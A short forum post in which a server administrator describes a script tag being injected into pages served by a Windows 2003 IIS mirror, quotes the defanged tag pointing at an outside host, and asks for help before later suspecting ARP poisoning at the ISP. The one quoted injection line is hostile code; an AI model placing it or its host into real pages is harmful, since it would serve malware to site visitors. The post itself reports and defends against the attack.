One of our Windows servers was misbehaving and code is being injected to pages:
<##script src=http://hounian.tj.cn/count/js/gif.gif><##/script##>
(the ## are added to avoid any kind of execution from here)
The above code is inserted to the beginning of the page and contains 28 0x00 bytes after it before the original page starts
The actual html page does NOT contain the code so it is somehow injected in IIS...
Anyone know how to solve this as I am only getting Chinese pages with similar info...
The server is running Win2K3 which is fully patched, but it runs anolder php version which maybe it the way they got in (not sure about this)
The mirror itself has been removed from the mirrorlist not to cause problems for unprotected users
Update:
I found this link:
http://www.ntsecurity.net/article/ar...-underway.html
So our server might not be infected but the ARP cache from the ISP hosting the server might be... I've submitted a ticket